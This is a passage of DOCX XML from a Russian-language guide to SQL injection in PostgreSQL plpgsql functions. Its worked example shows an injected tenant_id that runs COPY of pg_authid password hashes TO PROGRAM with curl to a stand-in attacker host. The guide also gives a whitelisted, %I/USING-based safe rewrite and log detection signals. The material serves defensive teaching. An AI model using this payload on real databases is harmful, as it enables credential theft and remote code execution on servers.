        <w:t xml:space="preserve">) AS t(id int,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В plpgsql функции sql_query собирается как (вычисленное):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM tenant_42; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TO PROGRAM 'curl http://attacker/$(cat -|base64)'; --.users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = 'foo' ORDER BY id ASC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EXECUTE парсит и исполняет:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Statement 1: SELECT * FROM tenant_42 (вернёт rows или relation does not exist)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Statement 2: COPY (SELECT rolpassword ...) TO PROGRAM '...' (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Statement 3 (после --): остаток ignored</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — полная переписывка на 3.16.1 + 3.16.3 + whitelist</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app.generate_report_safe(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    report_table text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_col text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_value text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order_dir text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RETURNS SETOF record LANGUAGE plpgsql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schema_name text;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed_tables text[] := ARRAY['users', 'articles', 'comments'];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed_cols text[] := ARRAY['id', 'name', 'created_at', 'status'];</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-- 1. Валидация tenant_id (только цифры)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tenant_id !~ '^[0-9]+$'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'invalid tenant_id: %', tenant_id;</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schema_name := 'tenant_' || tenant_id;  -- безопасно: только digit-suffix</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-- 2. Whitelist для report_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF report_table &lt;&gt; ALL(allowed_tables)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'table not in whitelist: %', report_table;</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 Whitelist для filter_col</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF filter_col &lt;&gt; ALL(allowed_cols)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'column not in whitelist: %', filter_col;</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-- 4. Whitelist для order_dir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF order_dir NOT IN ('ASC', 'DESC')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'invalid order direction: %', order_dir;</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-- 5. Построение SQL: identifier через %I, value через USING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT * FROM %I.%I WHERE %I = $1 ORDER BY id %s',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        schema_name, report_table, filter_col, order_dir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USING filter_value;</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Изменения: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tenant_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">^[0-9]+$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> гарантирует только digit (никакого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identifier-chars).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report_table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filter_col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&lt;&gt; ALL(whitelist)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order_dir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NOT IN ('ASC', 'DESC')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (whitelist на 2 значения).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filter_value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, value-bind.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Identifier components — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`%I`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, identifier-quoting.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order_dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставляется через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(после whitelist!) — это безопасно, потому что после whitelist значение гарантированно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'ASC'</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'DESC'</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Каждый из 5 параметров обработан правильным инструментом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это и есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">canonical safe pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для dynamic SQL в plpgsql.</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Variant A — exfiltration через UNION (3.1 канал). Variant B — destructive DDL или INSERT под caller-privilege; под SECURITY DEFINER — под owner. Variant C — full RCE через COPY TO PROGRAM (3.7.1) если функция SECURITY DEFINER + owner=superuser. Любой из вариантов в production daemon — критический incident.</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внутри EXECUTE — multiple statements, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... TO PROGRAM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DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, UNION в простых SELECT.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log_min_messages = warning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RAISE NOTICE 'executing: %'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сохраняет full constructed SQL в server log → видны все payload-ы целиком.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mod</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 ddl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: DROP/CREATE/INSERT внутри EXECUTE — критичные сигналы.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Application-логи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от user-driven endpoint с очень длинным relation_name.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критичный — все функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE ... || ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без USING — кандидаты на рефакторинг.</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Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">накопленный класс ошибок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> одной функции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Каждый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создаёт injection-точку.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Identifier-positions требуют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(3.16.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Value-positions требуют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%L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/USING (3.16.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Whitelist обязательны для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">позиций, которые нельзя bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ORDER BY direction, identifier).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в production-функции — leak SQL-text в server logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждая из этих ошибок by itself — known antipattern. Реальные legacy функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">накапливают все пять</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что разработчик «копировал и расширял» под новые tenant/report без рефакторинга.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Корень — отсутствие культуры использования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USING в plpgsql. В Python/Java standard ORM защищает от value-injection «по умолчанию» — разработчик не думает об этом. В plpgsql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">каждый dynamic SQL — это manual SQL-builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и каждый разработчик должен явно вызывать защитные функции.</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Антипаттерн возможен с самых ранних plpgsql (с 6.x).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EXECUTE на уязвимую функцию + (для Variant C RCE) функция должна быть SECURITY DEFINER или caller должен иметь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 ... || ...</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 USING.</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`||`-concat сам по себе не запрещён</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — он плохой только когда </w:t>
      </w:r>
      <w:r>
